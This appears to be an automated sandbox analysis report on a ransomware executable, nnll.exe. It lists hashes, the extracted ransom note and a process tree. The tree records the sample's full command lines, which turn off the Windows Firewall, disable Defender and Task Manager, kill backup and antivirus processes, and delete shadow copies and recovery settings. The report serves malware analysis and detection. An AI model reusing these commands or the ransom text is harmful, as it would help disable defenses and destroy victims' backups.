Overview

overview

10

Static

static

3

nnll.exe

windows7-x64

10

nnll.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    147s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230915-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
  • submitted
    18/09/2023, 17:29

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    nnll.exe

  • Size

    917KB

  • MD5

    bd5c08142cf5d80157242c950ef85e62

  • SHA1

    7b4657f833fd25f579bfc49abc42ac16e9bff697

  • SHA256

    dd595da7ed62a415d319d4903c62312bf52e10603b54c2051b45c6ca955606a3

  • SHA512

    c48b348cc9e606622a259cf6fa18f975866ab36036b546fe92551a3ae4bd510e2baf64a4cbdf4b7c09fc6f3f7b9fa949847d92766bd9d0261b0517d0b8d9c9db

  • SSDEEP

    24576:o8m657w6ZBLmkitKqBCjC0PDgM5AH5DT+j:MVV1BCjBEDT

Score
10/10
evasionpersistenceransomware

Malware Config

Extracted

Path

C:\Users\Admin\Downloads\_Readme.txt

Ransom Note
ATTENTION! Don’t worry, you can return all your files! All your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-O0PCajl3M8 Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that’s price for you is $490. Please note that you’ll never restore your data without payment. Check your e-mail “Spam” or “Junk” folder if you don’t get answer more than 6 hours. To get this software you need write on our e-mail: [email protected] Reserve e-mail address to contact us: [email protected] Your personal ID: n5XFQsJlZwoxavAndXp1rNnyrlKvAyYjUYv@Bi5P
URLs

https://we.tl/t-O0PCajl3M8

Signatures

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

    ransomware
  • Disables Task Manager via registry modification
    evasion
  • Modifies Windows Firewall 1 TTPs 5 IoCs
    evasion
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 2 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Kills process with taskkill 42 IoCs
    evasion
  • Modifies registry class 1 IoCs
  • Modifies registry key 1 TTPs 2 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
    ransomware
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SendNotifyMessage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware

Processes

  • C:\Users\Admin\AppData\Local\Temp\nnll.exe
    "C:\Users\Admin\AppData\Local\Temp\nnll.exe"
    1⤵
    • Checks computer location settings
    • Loads dropped DLL
    • Adds Run key to start application
    • Modifies registry class
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:4440
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c netsh advfirewall set allprofiles state off & netsh advfirewall set currentprofile state off & netsh advfirewall set domainprofile state off & netsh advfirewall set privateprofile state off & netsh advfirewall set publicprofile state off & REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f & REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f & REG ADD HKCU\Software\Microsoft\Windows\System /v DisableCMD /t REG_DWORD /d 2 /f & powershell -Command Add-MpPreference -ExclusionExtension .exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4160
      • C:\Windows\SysWOW64\netsh.exe
        netsh advfirewall set allprofiles state off
        3⤵
        • Modifies Windows Firewall
        PID:3840
      • C:\Windows\SysWOW64\netsh.exe
        netsh advfirewall set currentprofile state off
        3⤵
        • Modifies Windows Firewall
        PID:4476
      • C:\Windows\SysWOW64\netsh.exe
        netsh advfirewall set domainprofile state off
        3⤵
        • Modifies Windows Firewall
        PID:828
      • C:\Windows\SysWOW64\netsh.exe
        netsh advfirewall set privateprofile state off
        3⤵
        • Modifies Windows Firewall
        PID:1528
      • C:\Windows\SysWOW64\netsh.exe
        netsh advfirewall set publicprofile state off
        3⤵
        • Modifies Windows Firewall
        PID:3428
      • C:\Windows\SysWOW64\reg.exe
        REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
        3⤵
          PID:2300
        • C:\Windows\SysWOW64\reg.exe
          REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
          3⤵
          • Modifies registry key
          PID:316
        • C:\Windows\SysWOW64\reg.exe
          REG ADD HKCU\Software\Microsoft\Windows\System /v DisableCMD /t REG_DWORD /d 2 /f
          3⤵
          • Modifies registry key
          PID:388
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionExtension .exe
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4112
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c taskkill /F /IM BackupExecAgentBrowser* & taskkill /F /IM BackupExecDiveciMediaService* & taskkill /F /IM BackupExecJobEngine* & taskkill /F /IM BackupExecManagementService* & taskkill /F /IM vss* & taskkill /F /IM sql* & taskkill /F /IM svc$* & taskkill /F /IM memtas* & taskkill /F /IM sophos* & taskkill /F /IM veeam* & taskkill /F /IM backup* & taskkill /F /IM GxVss* & taskkill /F /IM GxBlr* & taskkill /F /IM GxFWD* & taskkill /F /IM GxCVD* & taskkill /F /IM GxCIMgr* & taskkill /F /IM DefWatch* & taskkill /F /IM ccEvtMgr* & taskkill /F /IM SavRoam* & taskkill /F /IM RTVscan* & taskkill /F /IM QBFCService* & taskkill /F /IM Intuit.QuickBooks.FCS* & taskkill /F /IM YooBackup* & taskkill /F /IM YooIT* & taskkill /F /IM zhudongfangyu* & taskkill /F /IM sophos* & taskkill /F /IM stc_raw_agent* & taskkill /F /IM VSNAPVSS* & taskkill /F /IM QBCFMonitorService* & taskkill /F /IM VeeamTransportSvc* & taskkill /F /IM VeeamDeploymentService* & taskkill /F /IM VeeamNFSSvc* & taskkill /F /IM veeam* & taskkill /F /IM PDVFSService* & taskkill /F /IM BackupExecVSSProvider* & taskkill /F /IM BackupExecAgentAccelerator* & taskkill /F /IM BackupExecRPCService* & taskkill /F /IM AcrSch2Svc* & taskkill /F /IM AcronisAgent* & taskkill /F /IM CASAD2DWebSvc* & taskkill /F /IM CAARCUpdateSvc* & taskkill /F /IM TeamViewer*
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:3636
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM BackupExecAgentBrowser*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:2720
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM BackupExecDiveciMediaService*
          3⤵
          • Kills process with taskkill
          PID:60
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM BackupExecJobEngine*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1136
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM BackupExecManagementService*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:4332
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM vss*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:4504
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM sql*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:4784
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM svc$*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:3876
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM memtas*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:932
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM sophos*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:5056
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM veeam*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:3332
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM backup*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:4368
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM GxVss*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:3720
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM GxBlr*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:2512
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM GxFWD*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:2172
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM GxCVD*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1764
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM GxCIMgr*
          3⤵
          • Kills process with taskkill
          PID:2760
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM DefWatch*
          3⤵
          • Kills process with taskkill
          PID:2920
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM ccEvtMgr*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1528
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM SavRoam*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:3620
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM RTVscan*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:3884
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM QBFCService*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:4076
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM Intuit.QuickBooks.FCS*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:4336
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM YooBackup*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:2192
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM YooIT*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:4464
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM zhudongfangyu*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:3548
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM sophos*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:948
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM stc_raw_agent*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:4772
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM VSNAPVSS*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:5008
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM QBCFMonitorService*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:2720
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM VeeamTransportSvc*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1344
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM VeeamDeploymentService*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:2760
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM VeeamNFSSvc*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:2896
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM veeam*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1832
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM PDVFSService*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:388
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM BackupExecVSSProvider*
          3⤵
          • Kills process with taskkill
          PID:4052
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM BackupExecAgentAccelerator*
          3⤵
          • Kills process with taskkill
          PID:2676
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM BackupExecRPCService*
          3⤵
          • Kills process with taskkill
          PID:4360
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM AcrSch2Svc*
          3⤵
          • Kills process with taskkill
          PID:2668
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM AcronisAgent*
          3⤵
          • Kills process with taskkill
          PID:3376
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM CASAD2DWebSvc*
          3⤵
          • Kills process with taskkill
          PID:2472
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM CAARCUpdateSvc*
          3⤵
          • Kills process with taskkill
          PID:3536
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM TeamViewer*
          3⤵
          • Kills process with taskkill
          PID:1296
      • C:\Windows\SysWOW64\NOTEPAD.EXE
        "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Roaming\_Readme.txt
        2⤵
        • Opens file in notepad (likely ransom note)
        PID:3252
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
        2⤵
          PID:1948
          • C:\Windows\System32\Conhost.exe
            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            3⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:2920
          • C:\Windows\SysWOW64\Wbem\WMIC.exe
            wmic shadowcopy delete
            3⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:748
      • C:\Windows\system32\vssvc.exe
        C:\Windows\system32\vssvc.exe
        1⤵
          PID:2828

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\Newtonsoft.Json.dll
          Filesize

          685KB

          MD5

          081d9558bbb7adce142da153b2d5577a

          SHA1

          7d0ad03fbda1c24f883116b940717e596073ae96

          SHA256

          b624949df8b0e3a6153fdfb730a7c6f4990b6592ee0d922e1788433d276610f3

          SHA512

          2fdf035661f349206f58ea1feed8805b7f9517a21f9c113e7301c69de160f184c774350a12a710046e3ff6baa37345d319b6f47fd24fbba4e042d54014bee511

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\Newtonsoft.Json.dll
          Filesize

          685KB

          MD5

          081d9558bbb7adce142da153b2d5577a

          SHA1

          7d0ad03fbda1c24f883116b940717e596073ae96

          SHA256

          b624949df8b0e3a6153fdfb730a7c6f4990b6592ee0d922e1788433d276610f3

          SHA512

          2fdf035661f349206f58ea1feed8805b7f9517a21f9c113e7301c69de160f184c774350a12a710046e3ff6baa37345d319b6f47fd24fbba4e042d54014bee511

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_b4rupats.0hv.ps1
          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          Download Submit

        • C:\Users\Admin\AppData\Roaming\_Readme.txt
          Filesize

          1KB

          MD5

          7ff1c51cfa7f816fbcd8b8436d01dd8d

          SHA1

          95f904b93545e220e698c797675aabed60bdc5b0

          SHA256

          c9b283cbda22cea9315810d1c5fa83cf11066ee5ccbff05356b316a011ec561f

          SHA512

          e07f08600d553bf0735b86fbb04943aa540a4e958d041b90f7e11b5d4700045b0b998e5c525ba888db256040fc0410b5b4cc0e36046817421809f8f7d8d37152

          Download Submit

        • C:\Users\Admin\AppData\Roaming\ext
          Filesize

          10B

          MD5

          de8d1381ba44020db262811c7843f729

          SHA1

          10a4d86d7091df21b9f78fd9364c427dedf7f1c8

          SHA256

          ad04557af6b056017a6454f25dfca9190a260363699563df4a634ee1fef1f969

          SHA512

          d9191068bcc66bbd2097561772cec1daee0692c2d62630ab3d883924cbfb85115780bae046a49d03b15000ef56ecad03ec9309600f8e48ec674019af6c936791

          Download Submit

        • C:\Users\Admin\Downloads\_Readme.txt
          Filesize

          1KB

          MD5

          7ff1c51cfa7f816fbcd8b8436d01dd8d

          SHA1

          95f904b93545e220e698c797675aabed60bdc5b0

          SHA256

          c9b283cbda22cea9315810d1c5fa83cf11066ee5ccbff05356b316a011ec561f

          SHA512

          e07f08600d553bf0735b86fbb04943aa540a4e958d041b90f7e11b5d4700045b0b998e5c525ba888db256040fc0410b5b4cc0e36046817421809f8f7d8d37152

          Download Submit

        • memory/4112-194-0x000000006F820000-0x000000006F86C000-memory.dmp

          Filesize

          304KB

          Download

        • memory/4112-214-0x0000000007A90000-0x000000000810A000-memory.dmp

          Filesize

          6.5MB

          Download

        • memory/4112-95-0x0000000004B60000-0x0000000004B96000-memory.dmp

          Filesize

          216KB

          Download

        • memory/4112-97-0x0000000004BD0000-0x0000000004BE0000-memory.dmp

          Filesize

          64KB

          Download

        • memory/4112-100-0x0000000004BD0000-0x0000000004BE0000-memory.dmp

          Filesize

          64KB

          Download

        • memory/4112-101-0x0000000005210000-0x0000000005838000-memory.dmp

          Filesize

          6.2MB

          Download

        • memory/4112-110-0x0000000005880000-0x00000000058A2000-memory.dmp

          Filesize

          136KB

          Download

        • memory/4112-113-0x0000000005920000-0x0000000005986000-memory.dmp

          Filesize

          408KB

          Download

        • memory/4112-327-0x0000000074430000-0x0000000074BE0000-memory.dmp

          Filesize

          7.7MB

          Download

        • memory/4112-116-0x0000000005A00000-0x0000000005A66000-memory.dmp

          Filesize

          408KB

          Download

        • memory/4112-126-0x0000000005BF0000-0x0000000005F44000-memory.dmp

          Filesize

          3.3MB

          Download

        • memory/4112-137-0x0000000006120000-0x000000000613E000-memory.dmp

          Filesize

          120KB

          Download

        • memory/4112-140-0x00000000061D0000-0x000000000621C000-memory.dmp

          Filesize

          304KB

          Download

        • memory/4112-167-0x0000000004BD0000-0x0000000004BE0000-memory.dmp

          Filesize

          64KB

          Download

        • memory/4112-190-0x000000007F660000-0x000000007F670000-memory.dmp

          Filesize

          64KB

          Download

        • memory/4112-191-0x0000000006710000-0x0000000006742000-memory.dmp

          Filesize

          200KB

          Download

        • memory/4112-288-0x0000000007770000-0x0000000007778000-memory.dmp

          Filesize

          32KB

          Download

        • memory/4112-204-0x00000000066F0000-0x000000000670E000-memory.dmp

          Filesize

          120KB

          Download

        • memory/4112-207-0x0000000007310000-0x00000000073B3000-memory.dmp

          Filesize

          652KB

          Download

        • memory/4112-96-0x0000000074430000-0x0000000074BE0000-memory.dmp

          Filesize

          7.7MB

          Download

        • memory/4112-217-0x0000000007450000-0x000000000746A000-memory.dmp

          Filesize

          104KB

          Download

        • memory/4112-222-0x00000000074C0000-0x00000000074CA000-memory.dmp

          Filesize

          40KB

          Download

        • memory/4112-237-0x00000000076D0000-0x0000000007766000-memory.dmp

          Filesize

          600KB

          Download

        • memory/4112-280-0x0000000007790000-0x00000000077AA000-memory.dmp

          Filesize

          104KB

          Download

        • memory/4112-247-0x0000000007650000-0x0000000007661000-memory.dmp

          Filesize

          68KB

          Download

        • memory/4112-272-0x0000000007680000-0x000000000768E000-memory.dmp

          Filesize

          56KB

          Download

        • memory/4112-277-0x0000000007690000-0x00000000076A4000-memory.dmp

          Filesize

          80KB

          Download

        • memory/4440-240-0x0000000074430000-0x0000000074BE0000-memory.dmp

          Filesize

          7.7MB

          Download

        • memory/4440-287-0x0000000005180000-0x0000000005190000-memory.dmp

          Filesize

          64KB

          Download

        • memory/4440-0-0x0000000000480000-0x000000000056A000-memory.dmp

          Filesize

          936KB

          Download

        • memory/4440-5-0x0000000005090000-0x000000000509A000-memory.dmp

          Filesize

          40KB

          Download

        • memory/4440-4-0x0000000005180000-0x0000000005190000-memory.dmp

          Filesize

          64KB

          Download

        • memory/4440-3-0x0000000004F50000-0x0000000004FE2000-memory.dmp

          Filesize

          584KB

          Download

        • memory/4440-386-0x00000000070B0000-0x0000000007160000-memory.dmp

          Filesize

          704KB

          Download

        • memory/4440-2-0x0000000005420000-0x00000000059C4000-memory.dmp

          Filesize

          5.6MB

          Download

        • memory/4440-1-0x0000000074430000-0x0000000074BE0000-memory.dmp

          Filesize

          7.7MB

          Download

        • memory/4440-390-0x0000000007360000-0x00000000076B4000-memory.dmp

          Filesize

          3.3MB

          Download

        • memory/4440-392-0x0000000074430000-0x0000000074BE0000-memory.dmp

          Filesize

          7.7MB

          Download